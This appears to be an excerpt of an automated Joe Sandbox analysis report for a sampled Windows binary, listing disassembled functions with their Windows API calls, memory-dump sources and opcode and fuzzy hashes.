                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap_free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 614378929-0
                                                                                                                                                                              • Opcode ID: 084237884b98cc7f5f1638c51d4bb16176ad033eb4d89e24ca60400f5291d870
                                                                                                                                                                              • Instruction ID: 65b48b67a3cacf51416199e154b267b1ac81b203f50f594d964c75dd2b3d4e69
                                                                                                                                                                              • Opcode Fuzzy Hash: 084237884b98cc7f5f1638c51d4bb16176ad033eb4d89e24ca60400f5291d870
                                                                                                                                                                              • Instruction Fuzzy Hash: C511EB31400251ABCB223F73AC18AAA3B98AF50367F10456FF94987391DF7C8E40A659
                                                                                                                                                                              Function 004F713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004F715C
                                                                                                                                                                              • _memset.LIBCMT ref: 004F717D
                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 004F71CF
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004F71D8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1157408455-0
                                                                                                                                                                              • Opcode ID: 39a906bee8f91725f6feca0f79e0d84efa980d14be79aeee7a3fe7d3118e4135
                                                                                                                                                                              • Instruction ID: 7420bbb8f6728824b191d700de9b123ef54f7c25ab6cacbb513f05a822be717c
                                                                                                                                                                              • Opcode Fuzzy Hash: 39a906bee8f91725f6feca0f79e0d84efa980d14be79aeee7a3fe7d3118e4135
                                                                                                                                                                              • Instruction Fuzzy Hash: 91110A719012287AD7205BA5AC4DFEBBA7CEF45760F10419AF504E72D0D2744E84CBB8
                                                                                                                                                                              Function 004F13D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 004F13EE
                                                                                                                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004F1409
                                                                                                                                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004F141F
                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 004F1474
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3137044355-0
                                                                                                                                                                              • Opcode ID: 399fabc238d4e90f68bb36fca76e6fa50854789a7d598271f033fac576e55d85
                                                                                                                                                                              • Instruction ID: 71c6191db950903b4ec620bf5d2dd126308a042c7d83df4c8b81ff14f05fc131
                                                                                                                                                                              • Opcode Fuzzy Hash: 399fabc238d4e90f68bb36fca76e6fa50854789a7d598271f033fac576e55d85
                                                                                                                                                                              • Instruction Fuzzy Hash: A0217F7150020DEBDB20DF91DC88AEABBBCEF40744F00846EE61297160D778EA49DF65
                                                                                                                                                                              Function 004EC265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 004EC285
                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004EC297
                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004EC2AD
                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004EC2C8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: ac441190c375cc07da697712b259b3547b0bae34a546541c145c466405044aa8
                                                                                                                                                                              • Instruction ID: d3b6395981a2f614710b440294e834208fc8073083d15eb34edee93d232ed532
                                                                                                                                                                              • Opcode Fuzzy Hash: ac441190c375cc07da697712b259b3547b0bae34a546541c145c466405044aa8
                                                                                                                                                                              • Instruction Fuzzy Hash: 4411187AD40218FFDB11DBD9C885E9DBBB4FB08710F204092EA04B7294D671AE11DB94
                                                                                                                                                                              Function 004F7C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004F7C6C
                                                                                                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 004F7C9F
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004F7CB5
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004F7CBC
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2880819207-0
                                                                                                                                                                              • Opcode ID: 0f372d3132ddc7e04067841f6915d2ffc3dbb33706bbef159c237c0f30e9e8e2
                                                                                                                                                                              • Instruction ID: e04abbc7c7f44d343d93c8b2f07fc1e7ddf560cdfcb31460806d0385503c805c
                                                                                                                                                                              • Opcode Fuzzy Hash: 0f372d3132ddc7e04067841f6915d2ffc3dbb33706bbef159c237c0f30e9e8e2
                                                                                                                                                                              • Instruction Fuzzy Hash: DF110872A04258AFCB019F68EC08AAB7FBE9B14324F144216FA25D3351D6748948B775
                                                                                                                                                                              Function 004CC619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004CC657
                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 004CC66B
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 004CC675
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3970641297-0
                                                                                                                                                                              • Opcode ID: a2ab15fd248159615988e6b8988e610934733bcc58b359df48c8d03901454aa4
                                                                                                                                                                              • Instruction ID: 46e0c5cc657d6d16e6f2eff965f88d8023adf824be1cbf5ba2622168bc466b34
                                                                                                                                                                              • Opcode Fuzzy Hash: a2ab15fd248159615988e6b8988e610934733bcc58b359df48c8d03901454aa4
                                                                                                                                                                              • Instruction Fuzzy Hash: 6F11A172601549BFDB114FA0AD85FEABB79FF19354F050116FA1852210C736DC60EBA5
                                                                                                                                                                              Function 004F49D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004F354D,?,004F45D5,?,00008000), ref: 004F49EE
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,004F354D,?,004F45D5,?,00008000), ref: 004F4A13
                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004F354D,?,004F45D5,?,00008000), ref: 004F4A1D
                                                                                                                                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,004F354D,?,004F45D5,?,00008000), ref: 004F4A50
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2875609808-0
                                                                                                                                                                              • Opcode ID: abed6c6a8664b16146799566f794e058d143bf10bbc649c3d9d52fb4f1959c96
                                                                                                                                                                              • Instruction ID: 33c9f45d393563e6f2b8addac5a5c023e277a56ab5cda7d801e2a086e439c18c
                                                                                                                                                                              • Opcode Fuzzy Hash: abed6c6a8664b16146799566f794e058d143bf10bbc649c3d9d52fb4f1959c96
                                                                                                                                                                              • Instruction Fuzzy Hash: CC115A31D4051CDBCF00EFA5EA49AEFBB74FF59701F000046EA41B2250DB389654DBA9
                                                                                                                                                                              Function 004E5BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                                                              • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                                              • Instruction ID: 9d5867dca2cb170ba1fdd45c0db641da04ac2a95cbef32f946fbe73becb18368
                                                                                                                                                                              • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                                              • Instruction Fuzzy Hash: C701833200068EBBCF125F86DC51CEE3F22BB18359F558816FE1859131C23AD9B2AB85
                                                                                                                                                                              Function 004D80E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004D869D: __getptd_noexit.LIBCMT ref: 004D869E
                                                                                                                                                                              • __lock.LIBCMT ref: 004D811F
                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004D813C
                                                                                                                                                                              • _free.LIBCMT ref: 004D814F
                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00F12490), ref: 004D8167
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2704283638-0
                                                                                                                                                                              • Opcode ID: 91ab35c347e6b935cd427af6733cd18290f0f607b82fd4edaa50a24341e8de27
                                                                                                                                                                              • Instruction ID: 7bb0fa705819ce1450a1a960bc1c0d4d24c11a06f4ca905ed6afcb25e74746ba
                                                                                                                                                                              • Opcode Fuzzy Hash: 91ab35c347e6b935cd427af6733cd18290f0f607b82fd4edaa50a24341e8de27
                                                                                                                                                                              • Instruction Fuzzy Hash: DF0161319016119BCB11AB69982A7BE77B0BF04714F04055FF81467391DF6C6C4ADFDA
                                                                                                                                                                              Function 004F9C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 004F9C7F
                                                                                                                                                                                • Part of subcall function 004FAD14: _memset.LIBCMT ref: 004FAD49
                                                                                                                                                                              • _memmove.LIBCMT ref: 004F9CA2
                                                                                                                                                                              • _memset.LIBCMT ref: 004F9CAF
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 004F9CBF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 48991266-0
                                                                                                                                                                              • Opcode ID: 6ad8ccb7c4c378ce5e796ce94435ff64c845a7d492f2826eecd15288d890cae1
                                                                                                                                                                              • Instruction ID: 0787b1c2e98ffb1a33dbfd1d8198f348af717c7167e01faab2f59e78c2d2e10e
                                                                                                                                                                              • Opcode Fuzzy Hash: 6ad8ccb7c4c378ce5e796ce94435ff64c845a7d492f2826eecd15288d890cae1
                                                                                                                                                                              • Instruction Fuzzy Hash: 7EF0307A200004ABCB016F55EC85A5ABB39EF45314B04C066FE085E217C735A825DBB5
                                                                                                                                                                              Function 0051E83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 004CB5EB
                                                                                                                                                                                • Part of subcall function 004CB58B: SelectObject.GDI32(?,00000000), ref: 004CB5FA
                                                                                                                                                                                • Part of subcall function 004CB58B: BeginPath.GDI32(?), ref: 004CB611
                                                                                                                                                                                • Part of subcall function 004CB58B: SelectObject.GDI32(?,00000000), ref: 004CB63B
                                                                                                                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0051E860
                                                                                                                                                                              • LineTo.GDI32(00000000,?,?), ref: 0051E86D
                                                                                                                                                                              • EndPath.GDI32(00000000), ref: 0051E87D
                                                                                                                                                                              • StrokePath.GDI32(00000000), ref: 0051E88B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1539411459-0
                                                                                                                                                                              • Opcode ID: 7886cd0e1d7056d182e2d376d521bfef044590daec97b9b6219b1f52a04437e1
                                                                                                                                                                              • Instruction ID: af1978f4062d5262f43aa7905824250c6f5f1bcc01e4dd7507ce0047429c4178
                                                                                                                                                                              • Opcode Fuzzy Hash: 7886cd0e1d7056d182e2d376d521bfef044590daec97b9b6219b1f52a04437e1
                                                                                                                                                                              • Instruction Fuzzy Hash: 0FF0BE31000659BBDB161F54BC0EFCA3FB9AF16710F008141FE01211E1837946A9EFA9
                                                                                                                                                                              Function 004ED623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004ED640
                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 004ED653
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004ED65A
                                                                                                                                                                              • AttachThreadInput.USER32(00000000), ref: 004ED661
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2710830443-0
                                                                                                                                                                              • Opcode ID: eb5bca6675448581161b8fcd26c34ac3a6fe07bb318157c41a05a28158ef1142
                                                                                                                                                                              • Instruction ID: 62b08af9db4e12219062c03b2e4f8af38cb4f0e7daa4c6eda44705339d49c0f6
                                                                                                                                                                              • Opcode Fuzzy Hash: eb5bca6675448581161b8fcd26c34ac3a6fe07bb318157c41a05a28158ef1142
                                                                                                                                                                              • Instruction Fuzzy Hash: 23E06D31501268BBDB201FB2EC0EEEB7F3CEF217A2F008011B51D85160CAB59594DBB4
                                                                                                                                                                              Function 004EBDF8 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 004EBE01
                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,004EB9C9), ref: 004EBE08
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004EB9C9), ref: 004EBE15
                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,004EB9C9), ref: 004EBE1C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3974789173-0
                                                                                                                                                                              • Opcode ID: 81e0d9a257b3413e664b39e67b840009b6e470484f30efe2174709e4fa48b426
                                                                                                                                                                              • Instruction ID: bba4b7405d9e48b8d8032e675964da64fe656e91f9266ca25e12ddafaeeb3821
                                                                                                                                                                              • Opcode Fuzzy Hash: 81e0d9a257b3413e664b39e67b840009b6e470484f30efe2174709e4fa48b426
                                                                                                                                                                              • Instruction Fuzzy Hash: 85E086326412119BD7105FF5AD0CBEB3BB8EF64B92F008818F641DA140E7388455DBB1
                                                                                                                                                                              Function 004CB0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSysColor.USER32(00000008), ref: 004CB0C5
                                                                                                                                                                              • SetTextColor.GDI32(?,000000FF), ref: 004CB0CF
                                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004CB0E4
                                                                                                                                                                              • GetStockObject.GDI32(00000005), ref: 004CB0EC
                                                                                                                                                                              • GetWindowDC.USER32(?,00000000), ref: 0052ECFA
                                                                                                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0052ED07
                                                                                                                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0052ED20
                                                                                                                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0052ED39
                                                                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0052ED59
                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0052ED64
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
